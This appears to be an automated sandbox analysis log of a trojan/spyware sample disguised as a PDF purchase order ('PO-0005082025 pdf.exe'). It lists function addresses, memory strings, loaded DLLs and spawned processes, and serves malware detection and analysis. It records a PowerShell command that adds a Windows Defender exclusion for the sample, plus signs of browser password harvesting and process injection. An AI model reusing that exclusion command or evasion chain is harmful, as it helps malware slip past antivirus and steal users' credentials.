Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0198516C	6_2_0198516C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0F0E0	6_2_01A0F0E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A070E9	6_2_01A070E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FF0CC	6_2_019FF0CC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019570C0	6_2_019570C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0199739A	6_2_0199739A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0132D	6_2_01A0132D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193D34C	6_2_0193D34C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019552A0	6_2_019552A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196B2C0	6_2_0196B2C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196D2F0	6_2_0196D2F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F12ED	6_2_019F12ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019ED5B0	6_2_019ED5B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A07571	6_2_01A07571
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0F43F	6_2_01A0F43F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01941460	6_2_01941460
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0F7B0	6_2_01A0F7B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A016CC	6_2_01A016CC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01995630	6_2_01995630
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E5910	6_2_019E5910
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01959950	6_2_01959950
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196B950	6_2_0196B950
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019538E0	6_2_019538E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BD800	6_2_019BD800
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196FB80	6_2_0196FB80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0198DBF9	6_2_0198DBF9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C5BF0	6_2_019C5BF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0FB76	6_2_01A0FB76
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EDAAC	6_2_019EDAAC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01995AA0	6_2_01995AA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F1AA3	6_2_019F1AA3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FDAC6	6_2_019FDAC6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A07A46	6_2_01A07A46
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0FA49	6_2_01A0FA49
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C3A6C	6_2_019C3A6C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196FDC0	6_2_0196FDC0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A07D73	6_2_01A07D73
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01953D40	6_2_01953D40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A01D5A	6_2_01A01D5A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0FCF2	6_2_01A0FCF2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C9C32	6_2_019C9C32
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01951F92	6_2_01951F92
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0FFB1	6_2_01A0FFB1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0FF09	6_2_01A0FF09
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01959EB0	6_2_01959EB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05260535	11_2_05260535
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05320591	11_2_05320591
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05304420	11_2_05304420
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05312446	11_2_05312446
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0530E4F6	11_2_0530E4F6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05260770	11_2_05260770
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05284750	11_2_05284750
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0525C7C0	11_2_0525C7C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527C6E0	11_2_0527C6E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05250100	11_2_05250100
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052FA118	11_2_052FA118
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052E8158	11_2_052E8158
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053141A2	11_2_053141A2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053201AA	11_2_053201AA
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053181CC	11_2_053181CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052F2000	11_2_052F2000
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531A352	11_2_0531A352
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053203E6	11_2_053203E6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0526E3F0	11_2_0526E3F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05300274	11_2_05300274
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052E02C0	11_2_052E02C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0526AD00	11_2_0526AD00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052FCD1F	11_2_052FCD1F
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05278DBF	11_2_05278DBF
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0525ADE0	11_2_0525ADE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05260C00	11_2_05260C00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05300CB5	11_2_05300CB5
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05250CF2	11_2_05250CF2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05302F30	11_2_05302F30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052A2F28	11_2_052A2F28
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05280F30	11_2_05280F30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052D4F40	11_2_052D4F40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052DEFA0	11_2_052DEFA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05252FC8	11_2_05252FC8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531EE26	11_2_0531EE26
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05260E59	11_2_05260E59
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531CE93	11_2_0531CE93
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05272E90	11_2_05272E90
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531EEDB	11_2_0531EEDB
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05276962	11_2_05276962
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052629A0	11_2_052629A0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0532A9A6	11_2_0532A9A6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05262840	11_2_05262840
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0526A840	11_2_0526A840
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052468B8	11_2_052468B8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0528E8F0	11_2_0528E8F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531AB40	11_2_0531AB40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05316BD7	11_2_05316BD7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0525EA80	11_2_0525EA80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05317571	11_2_05317571
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052FD5B0	11_2_052FD5B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531F43F	11_2_0531F43F
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05251460	11_2_05251460
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531F7B0	11_2_0531F7B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053116CC	11_2_053116CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0529516C	11_2_0529516C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0524F172	11_2_0524F172
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0532B16B	11_2_0532B16B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0526B1B0	11_2_0526B1B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531F0E0	11_2_0531F0E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053170E9	11_2_053170E9
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052670C0	11_2_052670C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0530F0CC	11_2_0530F0CC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531132D	11_2_0531132D
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0524D34C	11_2_0524D34C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052A739A	11_2_052A739A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052652A0	11_2_052652A0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527D2F0	11_2_0527D2F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_053012ED	11_2_053012ED
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527B2C0	11_2_0527B2C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05317D73	11_2_05317D73
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05263D40	11_2_05263D40
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05311D5A	11_2_05311D5A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527FDC0	11_2_0527FDC0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052D9C32	11_2_052D9C32
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531FCF2	11_2_0531FCF2
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531FF09	11_2_0531FF09
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531FFB1	11_2_0531FFB1
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05261F92	11_2_05261F92
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05269EB0	11_2_05269EB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052F5910	11_2_052F5910
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05269950	11_2_05269950
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527B950	11_2_0527B950
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052CD800	11_2_052CD800
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052638E0	11_2_052638E0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531FB76	11_2_0531FB76
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0527FB80	11_2_0527FB80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0529DBF9	11_2_0529DBF9
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052D5BF0	11_2_052D5BF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052D3A6C	11_2_052D3A6C
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05317A46	11_2_05317A46
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0531FA49	11_2_0531FA49
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052FDAAC	11_2_052FDAAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052A5AA0	11_2_052A5AA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05301AA3	11_2_05301AA3
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0530DAC6	11_2_0530DAC6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03241FD0	11_2_03241FD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323CEC7	11_2_0323CEC7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323CED0	11_2_0323CED0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_032313A4	11_2_032313A4
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323B247	11_2_0323B247
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323B250	11_2_0323B250
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323B100	11_2_0323B100
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323D0F0	11_2_0323D0F0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0323B0F7	11_2_0323B0F7
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03245690	11_2_03245690
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0324387B	11_2_0324387B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03243880	11_2_03243880
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0325BC10	11_2_0325BC10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510E5AC	11_2_0510E5AC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510D678	11_2_0510D678
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510E0F8	11_2_0510E0F8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510E213	11_2_0510E213

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: String function: 01985130 appears 58 times
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: String function: 019CF290 appears 103 times
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: String function: 01997E54 appears 99 times
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: String function: 0193B970 appears 262 times
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: String function: 019BEA12 appears 86 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 052DF290 appears 103 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 05295130 appears 58 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 052A7E54 appears 99 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 052CEA12 appears 86 times
Source: C:\Windows\SysWOW64\cttune.exe	Code function: String function: 0524B970 appears 262 times

Source: PO-0005082025 pdf.exe, 00000000.00000002.1744497080.000000000146E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000000.1713199042.0000000000E32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedBkU.exe@ vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1766980761.0000000007C10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1766555849.0000000007BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000000.00000002.1764900052.0000000007890000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000006.00000002.2292380085.0000000001A3D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe, 00000006.00000002.2292077264.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCTTUNE.EXEj% vs PO-0005082025 pdf.exe
Source: PO-0005082025 pdf.exe	Binary or memory string: OriginalFilenamedBkU.exe@ vs PO-0005082025 pdf.exe

Source: PO-0005082025 pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO-0005082025 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/7@5/3

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-0005082025 pdf.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4yysyzg.gjb.ps1

Jump to behavior

Source: PO-0005082025 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-0005082025 pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cttune.exe, 0000000B.00000003.2478964503.000000000330A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2479173088.000000000332A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2977024809.000000000332A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO-0005082025 pdf.exe	Virustotal: Detection: 39%
Source: PO-0005082025 pdf.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
